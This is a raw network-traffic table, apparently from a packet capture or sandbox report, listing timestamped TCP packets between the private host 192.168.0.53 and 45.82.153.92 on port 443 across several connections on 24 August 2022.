Aug 24, 2022 11:19:00.183623075 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.190028906 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.190052032 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.297508955 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.297705889 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.297791958 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.297801018 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.298363924 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.298372984 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.301081896 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.301332951 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.301465034 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.301471949 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.305712938 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.305804014 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.305959940 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.305975914 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.306185961 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.306202888 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.306428909 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.446572065 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.446602106 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.446715117 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.446732998 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.446818113 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.446829081 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.446881056 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.446949005 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.446959019 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.446964025 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.446980953 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.447062969 CEST	49307	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.447077990 CEST	443	49307	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.535562038 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.535614014 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.535742044 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.542231083 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.542270899 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.648233891 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.648396969 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.648520947 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.648530960 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.649126053 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.649137974 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.651807070 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.652106047 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.652193069 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.652200937 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.656198978 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.656243086 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.656400919 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.656475067 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.656630993 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.656651020 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.656825066 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845118999 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.845149994 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.845273018 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845294952 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.845395088 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845506907 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845515966 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.845523119 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845526934 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845530987 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845535040 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845629930 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845634937 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845638037 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845642090 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845803976 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.845808983 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.847132921 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.847239017 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:00.847383022 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.847399950 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.847537041 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.847543001 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.847547054 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.847549915 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.847557068 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.848381042 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.848422050 CEST	49308	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:00.848442078 CEST	443	49308	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.060964108 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.061002016 CEST	443	49309	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.061193943 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.066643953 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.066683054 CEST	443	49309	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.174834013 CEST	443	49309	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.175040007 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.175124884 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.175132990 CEST	443	49309	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.175694942 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.175704956 CEST	443	49309	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.178499937 CEST	443	49309	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.179502964 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.179537058 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.179542065 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.183470011 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.183571100 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.183578014 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.183708906 CEST	443	49309	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.184731960 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.184740067 CEST	443	49309	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.185827017 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.324314117 CEST	443	49309	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.324403048 CEST	443	49309	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.324465036 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.324556112 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.324687004 CEST	49309	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.324704885 CEST	443	49309	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.477817059 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.477853060 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.478020906 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.484868050 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.484880924 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.592196941 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.593316078 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.593425035 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.593431950 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.593910933 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.593915939 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.595624924 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.596611023 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.596646070 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.596651077 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.600318909 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.600420952 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.600426912 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.600518942 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.601519108 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.601525068 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.602554083 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.740807056 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.740840912 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.740935087 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.740945101 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.741100073 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.741214991 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.741219997 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.741223097 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.741226912 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.741230965 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.741238117 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.741364956 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.741373062 CEST	49310	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.741385937 CEST	443	49310	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.931174994 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.931230068 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:01.931375027 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.938515902 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:01.938555002 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.049918890 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.050088882 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.050173998 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.050183058 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.050735950 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.050746918 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.053467989 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.053700924 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.053828001 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.053834915 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.057531118 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.057578087 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.057595015 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.057796955 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.058623075 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.058656931 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.059676886 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.143273115 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.143313885 CEST	443	49312	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.143534899 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.148880959 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.148919106 CEST	443	49312	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.252588034 CEST	443	49312	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.252733946 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.252860069 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.252871990 CEST	443	49312	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.253371000 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.253381968 CEST	443	49312	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.254828930 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.254862070 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.254971981 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.254990101 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.255013943 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.255187035 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.255199909 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.255204916 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.255208969 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.255213022 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.255215883 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.255219936 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.255336046 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.255341053 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.255345106 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.255347967 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.255434036 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.255563974 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.256685972 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.256820917 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.256942987 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.256958961 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.257049084 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.257056952 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.257061005 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.257065058 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.257070065 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.257529974 CEST	443	49312	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.257766008 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.257778883 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.257891893 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.257894993 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.257903099 CEST	49311	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.257915974 CEST	443	49311	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.261430979 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.261492014 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.261509895 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.261725903 CEST	443	49312	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.261948109 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.261965990 CEST	443	49312	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.262171984 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.395684958 CEST	443	49312	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.395771980 CEST	443	49312	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.395823002 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.395929098 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.396023989 CEST	49312	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.396039963 CEST	443	49312	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.696019888 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.696074963 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.696310997 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.702003002 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.702042103 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.808253050 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.809263945 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.809545040 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.809559107 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.810158968 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.810170889 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.812922001 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.813998938 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.814120054 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.814126968 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.817941904 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.818064928 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.818216085 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.818245888 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.819242001 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.819259882 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.820214033 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.959243059 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.959342957 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.960393906 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.960413933 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.960448980 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.960464954 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:02.961214066 CEST	49313	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:02.961225033 CEST	443	49313	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.179898024 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.179955959 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.180109024 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.186119080 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.186156988 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.294841051 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.295064926 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.295150042 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.295160055 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.295695066 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.295706034 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.298432112 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.298666000 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.298794031 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.298800945 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.303752899 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.303775072 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.303895950 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.304012060 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.305031061 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.305052996 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.306123972 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.443958044 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.443988085 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.444114923 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.444133997 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.444221020 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.444366932 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.444370985 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.444377899 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.444381952 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.444386005 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.444560051 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.444614887 CEST	443	49314	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.444689989 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.444818974 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.445137024 CEST	49314	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.522186041 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.522212029 CEST	443	49315	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.522444963 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.527908087 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.527920008 CEST	443	49315	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.636372089 CEST	443	49315	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.636498928 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.636672974 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.636682034 CEST	443	49315	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.637142897 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.637151957 CEST	443	49315	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.638776064 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.638828993 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.639127016 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.639868975 CEST	443	49315	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.640204906 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.640213013 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.640218973 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.643708944 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.643846989 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.643857956 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.644032001 CEST	443	49315	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.644160986 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.644176960 CEST	443	49315	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.644314051 CEST	49315	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.644959927 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.644980907 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.712399006 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.712451935 CEST	443	49317	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.712615013 CEST	49317	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.755078077 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.755213976 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.755373955 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.755383968 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.755942106 CEST	49316	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:03.755950928 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.758605957 CEST	443	49316	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:03.758811951 CEST	49316	443	192.168.0.53	45.82.153.92
